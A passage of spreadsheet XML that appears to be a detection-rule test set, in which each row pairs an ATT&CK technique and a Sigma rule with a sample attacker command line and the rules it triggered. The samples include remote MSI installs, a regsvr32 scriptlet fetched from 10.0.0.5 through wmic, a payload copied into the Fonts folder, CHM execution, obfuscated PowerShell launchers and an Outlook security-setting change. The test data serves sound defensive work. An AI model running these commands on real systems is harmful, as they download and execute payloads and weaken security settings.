      <c r="D3038" s="43" t="inlineStr">
        <is>
          <t>4bc90587-e6ca-4b41-be0b-ed4d04e4ed0c</t>
        </is>
      </c>
      <c r="E3038" s="43" t="inlineStr">
        <is>
          <t>msiexec.exe /i http://example.com/payload.msi /qn</t>
        </is>
      </c>
      <c r="F3038" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3038" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3038" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3038" s="43" t="inlineStr">
        <is>
          <t>Msiexec Quiet Installation (79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5); Suspicious Msiexec Quiet Install From Remote Location (8150732a-0c9d-4a99-82b9-9efb9b90c40c)</t>
        </is>
      </c>
      <c r="J3038" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3038" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3039" ht="15.75" customHeight="1" s="42">
      <c r="A3039" s="43" t="inlineStr">
        <is>
          <t>t1219</t>
        </is>
      </c>
      <c r="B3039" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_velociraptor_child_process</t>
        </is>
      </c>
      <c r="C3039" s="43" t="inlineStr">
        <is>
          <t>Suspicious Velociraptor Child Process</t>
        </is>
      </c>
      <c r="D3039" s="43" t="inlineStr">
        <is>
          <t>4bc90587-e6ca-4b41-be0b-ed4d04e4ed0c</t>
        </is>
      </c>
      <c r="E3039" s="43" t="inlineStr">
        <is>
          <t>msiexec.exe /i http://example.com/payload.msi /quiet</t>
        </is>
      </c>
      <c r="F3039" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3039" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3039" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3039" s="43" t="inlineStr">
        <is>
          <t>Msiexec Quiet Installation (79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5); Suspicious Msiexec Quiet Install From Remote Location (8150732a-0c9d-4a99-82b9-9efb9b90c40c)</t>
        </is>
      </c>
      <c r="J3039" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3039" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3040" ht="15.75" customHeight="1" s="42">
      <c r="A3040" s="43" t="inlineStr">
        <is>
          <t>t1211</t>
        </is>
      </c>
      <c r="B3040" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C3040" s="43" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D3040" s="43" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E3040" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c 'Copy-Item -Path payload.exe -Destination C:\Windows\Fonts\'</t>
        </is>
      </c>
      <c r="F3040" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3040" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3040" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3040" s="43" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder (ae9b0bd7-8888-4606-b444-0ed7410cb728); Writing Of Malicious Files To The Fonts Folder (ae9b0bd7-8888-4606-b444-0ed7410cb728)</t>
        </is>
      </c>
      <c r="J3040" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3040" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3041" ht="15.75" customHeight="1" s="42">
      <c r="A3041" s="43" t="inlineStr">
        <is>
          <t>t1211</t>
        </is>
      </c>
      <c r="B3041" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C3041" s="43" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D3041" s="43" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E3041" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command Copy-Item -Path payload.exe -Destination C:\Windows\Fonts\</t>
        </is>
      </c>
      <c r="F3041" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3041" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3041" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3041" s="43" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder (ae9b0bd7-8888-4606-b444-0ed7410cb728); Writing Of Malicious Files To The Fonts Folder (ae9b0bd7-8888-4606-b444-0ed7410cb728)</t>
        </is>
      </c>
      <c r="J3041" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3041" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3042" ht="15.75" customHeight="1" s="42">
      <c r="A3042" s="43" t="inlineStr">
        <is>
          <t>t1211</t>
        </is>
      </c>
      <c r="B3042" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C3042" s="43" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D3042" s="43" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E3042" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Copy-Item -Path payload.exe -Destination 'C:\Windows\Fonts\'"</t>
        </is>
      </c>
      <c r="F3042" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3042" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3042" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3042" s="43" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder (ae9b0bd7-8888-4606-b444-0ed7410cb728); Writing Of Malicious Files To The Fonts Folder (ae9b0bd7-8888-4606-b444-0ed7410cb728)</t>
        </is>
      </c>
      <c r="J3042" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3042" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3043" ht="15.75" customHeight="1" s="42">
      <c r="A3043" s="43" t="inlineStr">
        <is>
          <t>t1211</t>
        </is>
      </c>
      <c r="B3043" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C3043" s="43" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D3043" s="43" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E3043" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command {Copy-Item -Path payload.exe -Destination C:\Windows\Fonts\}</t>
        </is>
      </c>
      <c r="F3043" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3043" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3043" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3043" s="43" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder (ae9b0bd7-8888-4606-b444-0ed7410cb728); Writing Of Malicious Files To The Fonts Folder (ae9b0bd7-8888-4606-b444-0ed7410cb728)</t>
        </is>
      </c>
      <c r="J3043" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3043" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3044" ht="15.75" customHeight="1" s="42">
      <c r="A3044" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3044" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3044" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3044" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3044" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Public\Downloads &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F3044" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3044" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3044" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3044" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3044" s="43" t="n"/>
      <c r="K3044" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3045" ht="15.75" customHeight="1" s="42">
      <c r="A3045" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3045" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3045" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3045" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3045" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "copy C:\Windows\hh.exe C:\ProgramData\not_hh.exe &amp;&amp; C:\ProgramData\not_hh.exe C:\Users\%USERNAME%\Documents\payload.chm"</t>
        </is>
      </c>
      <c r="F3045" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3045" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3045" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3045" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3045" s="43" t="n"/>
      <c r="K3045" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3046" ht="15.75" customHeight="1" s="42">
      <c r="A3046" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3046" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3046" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3046" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3046" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd %USERPROFILE%\Downloads &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F3046" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3046" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3046" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3046" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3046" s="43" t="n"/>
      <c r="K3046" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3047" ht="15.75" customHeight="1" s="42">
      <c r="A3047" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3047" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C3047" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D3047" s="43" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E3047" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "echo Write-Host 'Bypass' | powershell.exe -noprofile -command -"</t>
        </is>
      </c>
      <c r="F3047" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3047" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3047" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3047" s="43" t="n"/>
      <c r="J3047" s="43" t="n"/>
      <c r="K3047" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3048" ht="15.75" customHeight="1" s="42">
      <c r="A3048" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3048" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C3048" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D3048" s="43" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E3048" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C "echo Write-Host 'Bypass' | powershell.exe -noprofile -command -"</t>
        </is>
      </c>
      <c r="F3048" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3048" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3048" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3048" s="43" t="n"/>
      <c r="J3048" s="43" t="n"/>
      <c r="K3048" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3049" ht="15.75" customHeight="1" s="42">
      <c r="A3049" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3049" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C3049" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D3049" s="43" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E3049" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c echo Write-Host "'Bypass Test'" | clip &amp; powershell -"c" IEX([Windows.Forms.Clipboard]::GetText())</t>
        </is>
      </c>
      <c r="F3049" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3049" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3049" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3049" s="43" t="n"/>
      <c r="J3049" s="43" t="n"/>
      <c r="K3049" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3050" ht="15.75" customHeight="1" s="42">
      <c r="A3050" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3050" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_cli_obfuscation_unicode_img</t>
        </is>
      </c>
      <c r="C3050" s="43" t="inlineStr">
        <is>
          <t>Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image</t>
        </is>
      </c>
      <c r="D3050" s="43" t="inlineStr">
        <is>
          <t>584bca0f-3608-4402-80fd-4075ff6072e3</t>
        </is>
      </c>
      <c r="E3050" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "w^h^o^a^m^i"</t>
        </is>
      </c>
      <c r="F3050" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3050" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3050" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3050" s="43" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073)</t>
        </is>
      </c>
      <c r="J3050" s="43" t="n"/>
      <c r="K3050" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3051" ht="15.75" customHeight="1" s="42">
      <c r="A3051" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3051" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_cli_obfuscation_unicode_img</t>
        </is>
      </c>
      <c r="C3051" s="43" t="inlineStr">
        <is>
          <t>Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image</t>
        </is>
      </c>
      <c r="D3051" s="43" t="inlineStr">
        <is>
          <t>584bca0f-3608-4402-80fd-4075ff6072e3</t>
        </is>
      </c>
      <c r="E3051" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C "w^h^o^a^m^i"</t>
        </is>
      </c>
      <c r="F3051" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3051" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3051" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3051" s="43" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073)</t>
        </is>
      </c>
      <c r="J3051" s="43" t="n"/>
      <c r="K3051" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3052" ht="15.75" customHeight="1" s="42">
      <c r="A3052" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B3052" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_office_outlook_enable_unsafe_client_mail_rules</t>
        </is>
      </c>
      <c r="C3052" s="43" t="inlineStr">
        <is>
          <t>Outlook EnableUnsafeClientMailRules Setting Enabled</t>
        </is>
      </c>
      <c r="D3052" s="43" t="inlineStr">
        <is>
          <t>55f0a3a1-846e-40eb-8273-677371b8d912</t>
        </is>
      </c>
      <c r="E3052" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "reg add HKCU\Software\Microsoft\Office\16.0\Outlook\Security /v EnableUn^safeClientMailRules /t REG_DWORD /d 1 /f"</t>
        </is>
      </c>
      <c r="F3052" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3052" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3052" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3052" s="43" t="n"/>
      <c r="J3052" s="43" t="n"/>
      <c r="K3052" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3053" ht="15.75" customHeight="1" s="42">
      <c r="A3053" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B3053" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_office_outlook_enable_unsafe_client_mail_rules</t>
        </is>
      </c>
      <c r="C3053" s="43" t="inlineStr">
        <is>
          <t>Outlook EnableUnsafeClientMailRules Setting Enabled</t>
        </is>
      </c>
      <c r="D3053" s="43" t="inlineStr">
        <is>
          <t>55f0a3a1-846e-40eb-8273-677371b8d912</t>
        </is>
      </c>
      <c r="E3053" s="43" t="inlineStr">
        <is>
          <t>reg.exe add "HKCU\Software\Policies\Microsoft\Office\16.0\Outlook\Security" /v EnableUnsafeClientMailRules /t REG_DWORD /d 1 /f</t>
        </is>
      </c>
      <c r="F3053" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3053" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3053" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3053" s="43" t="n"/>
      <c r="J3053" s="43" t="n"/>
      <c r="K3053" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3054" ht="15.75" customHeight="1" s="42">
      <c r="A3054" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B3054" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C3054" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D3054" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E3054" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c copy C:\Windows\System32\regsvr32.exe %TEMP%\updater.exe &amp;&amp; wmic process call create "%TEMP%\updater.exe /s /i:http://10.0.0.5/payload.sct scrobj.dll"</t>
        </is>
      </c>
      <c r="F3054" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3054" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3054" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3054" s="43" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8); Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767); New Process Created Via Wmic.EXE (526be59f-a573-4eea-b5f7-f0973207634d)</t>
        </is>
      </c>
      <c r="J3054" s="43" t="n"/>
      <c r="K3054" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3055" ht="15.75" customHeight="1" s="42">
      <c r="A3055" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B3055" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C3055" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D3055" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E3055" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /c set __COMPAT_LAYER= &amp;&amp; wscript.exe //E:jscript //Nologo C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F3055" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3055" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3055" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3055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55" s="43" t="n"/>
      <c r="K3055" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3056" ht="15.75" customHeight="1" s="42">
      <c r="A3056" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B3056" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C3056" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D3056" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E3056" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /"c" set __COMPAT_LAYER= &amp;&amp; wscript.exe //e:jSCRiPt -"/Nologo" C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F3056" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3056" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3056" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3056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56" s="43" t="n"/>
      <c r="K3056" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3057" ht="15.75" customHeight="1" s="42">
      <c r="A3057" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B3057" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C3057" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D3057" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E3057" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /"c" set __COMPAT_LAYER= &amp;&amp; wscript.exe //E:jscript //nolOgO C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F3057" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3057" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3057" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3057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57" s="43" t="n"/>
      <c r="K3057" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3058" ht="15.75" customHeight="1" s="42">
      <c r="A3058" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B3058" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C3058" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D3058" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E3058" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /c set __COMPAT_LAYER= &amp;&amp; wscript.exe -"/E:jscript" //Nologo C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F3058" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3058" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3058" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3058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058" s="43" t="n"/>
      <c r="K3058" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3059" ht="15.75" customHeight="1" s="42">
      <c r="A3059" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B3059" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C3059" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D3059" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E3059" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /"c" set __COMPAT_LAYER= &amp;&amp; wscript.exe //E:jscript //NoLOGO C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F3059" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3059" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3059" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3059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59" s="43" t="n"/>
      <c r="K3059" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3060" ht="15.75" customHeight="1" s="42">
      <c r="A3060" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B3060" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C3060" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D3060" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E3060" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /c set __COMPAT_LAYER= &amp;&amp; wscript.exe //E:jscript /"/Nologo" C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F3060" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3060" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3060" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3060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0" s="43" t="n"/>
      <c r="K3060" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3061" ht="15.75" customHeight="1" s="42">
      <c r="A3061" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B3061" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C3061" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D3061" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E3061" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /C set __COMPAT_LAYER= &amp;&amp; wscript.exe /"/E:jscript" //Nologo C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F3061" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3061" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3061" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3061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061" s="43" t="n"/>
      <c r="K3061" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3062" ht="15.75" customHeight="1" s="42">
      <c r="A3062" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B3062" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C3062" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D3062" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E3062" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /c set __COMPAT_LAYER= &amp;&amp; wscript.exe //E:jscript //nOloGo C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F3062" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3062" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3062" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3062" s="43" t="inlineStr">
        <is>
          <t>Script Interpreter Execution From Suspicious Folder (1228c958-e64e-4e71-92ad-7d429f4138ba); Script Interpreter Execution From Suspicious Folder (1228c958-e64e-4e71-92ad-7d429f4138ba);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2" s="43" t="n"/>
      <c r="K3062" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3063" ht="15.75" customHeight="1" s="42">
      <c r="A3063" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B3063" s="43" t="inlineStr">
        <is>
